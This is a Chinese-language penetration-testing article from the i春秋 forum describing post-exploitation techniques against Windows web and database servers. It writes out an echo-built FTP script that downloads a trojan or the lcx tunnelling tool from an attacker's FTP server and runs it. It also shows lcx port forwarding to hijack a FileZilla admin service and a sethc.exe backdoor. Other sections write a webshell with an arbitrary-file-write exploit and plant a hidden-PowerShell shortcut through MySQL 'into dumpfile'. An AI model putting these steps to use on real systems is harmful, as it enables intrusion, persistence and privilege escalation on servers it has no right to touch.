本文来自i春秋作者：Binghe

目录

0x01 内网sa低权、内网注入点可os-shell情况适用

0x02 同第一个问题，但是站、库一体

0x03 目录权限的猥琐利用

0x04 FTP的一些利用方式

0x05 快捷方式调用powershell隐藏执行命令

0x01 内网sa低权、内网注入点可os-shell情况适用

（后者情况如是站裤分离，则目标机为数据库服务器）

mysql或许可以分割hex导出一个shell或lcx上去，mssql则不能 那么可以选择ftp，那么就会有人问你不是nc反弹的交互式，如何输入ftp密码？

其实可以批量执行，echo追加写文件，称为ftp下载者 先在外网搭建个ftp，帐号密码123，根目录放lcx或者是你的远控exe

echo open Ftp-ip>ftp.TXT //连接FTP
echo 123>>ftp.TXT       //输入用户名
echo 123>>ftp.TXT       //输入密码
echo get lcx c:lcx.exe>>ftp.TXT //执行下载命令
echo bye>>ftp.TXT             //退出
ftp -s:ftp.txt                //执行FTP.TXT文件中的FTP命令

然后你懂得 可以直接在下载到的路径运行你的muma或者lcx

0x02 同第一个问题，但是站、库一体

目标是web服务，当然可以用以上方法直接上服务器，但是问题来了，如果你的东西不免杀，或者他的ftp不可用咋办。 退而求其次，可以尝试echo往web目录shell，问题又来了，你没有web物理路径。 路径可以通过搜索文件得到，主页右键看源码得到一个生僻的js文件

dir /s/b 驱动器号:\example.js

驱动器ABCDEFG随便试试如果存在，会返回一个具体的绝对路径

接下来的事就不必多说了，双引号不影响脚本使用

0x03 目录权限的猥琐利用

比较累，不细说。拿到shell，可执行，但权限死，各种不成功可以试试微软的那个写入任意任意文件夹的0day，补丁就算了。

poc：https://github.com/monoxgas/Trebuchet

用法

Trebuchet.exe D:\1.txt c:\web\binghesec.asp

win8.1+net4.0测试效果（目录我已经设置了sys权限）

你也许会认为:“那又怎么样?你只是可以写入任意文件而已。 那我也只能呵呵 那么我们可不可以来个lpk.dll劫持?可不可以。。。 那么某些情况下的跨目录旁站写shell岂不是轻而易举？

0x04 FTP的一些利用方式

拿到shell后，权限很死，提权一筹莫展，程序的安装目录虽不可修改但可以访问，还可以下载。

如果遇到ftp等字眼，也许这就是转机。

1. ServU和G6 FTP这类的数据库有默认口令，有时候还可以看配置文件，或者反编译servuadmin.exe得到口令，可以间接执行命令，不再多说。
2. filezilla这类ftp服务一般不允许外部IP连接，可以把lcx端口转出来再连接（他的默认服务端口是14147）。把整个目录打包到本地，避免版本错误。

自己的vps执行：

lcx.exe -l 3333 4444

再将服务端的14147端口转发到lcx监听的3333端口上，可以用脚本 ，也可以用lcx

在vps上打开打包的Filezilla，连接端口4444，连上之后就相当于在他服务器上打开ftp一样，现在来创建个C盘的ftp服务，然后上传一个你改写的sethc.exe替换c:\windows\system32目录的sethc.exe，然后你懂得

3.flashfxp这类的FTP服务，虽可以配置文件看到密码，但是可以整个软件目录打包到本地，然后打开用星号查看器得到密码，这个服务也许权限不太高，但有可能用来爆破其他服务的密码。

0x05 最近比较火的一种新型的攻击方式，快捷方式调用powershell隐藏执行命令

已有利用工具，来自俄罗斯的黑阔，感谢吐司大牛分享出来。

url一栏是打开快捷方式时私密打开的程序，最后一栏是前台打开的程序，其他任意，图标可更换 看下效果，果然生猛！

你可以用他恶作剧，我们来用他提权。 url填木马地址，start process填ie浏览器的或者其他桌面的图标，生成之后，替换桌面，然后。。。。 有的小伙伴就会问了，能替换到桌面图标了，权限就够高了，还提权干嘛，我说：低权限请参考本文0x03 另外我们可以结合mysql的导出功能，当udf失败时可以用，现在高版本的mysql都不能udf提权了，我给大家做个例子 生成快捷方式之后存在本机磁盘，例：e:\IE

然后

select hex(load_file('e:/ie')) into dumpfile 'e:/1.txt';

打开e:\1.txt,复合里面16进制内容的code 然后在目标的mysql执行

select 0x(code,不需要括号) into dumpfile '目标桌面的IE快捷方式路径'；

这样。当管理员在服务器开IE时，就。。。，

总结：

渗透测试所遇情况千变万化，哪里有真正的总结 仅作测试，请勿非法攻击。

本文由i春秋学院提供:http://bbs.ichunqiu.com/thread-10718-1-1.html?from=paper

---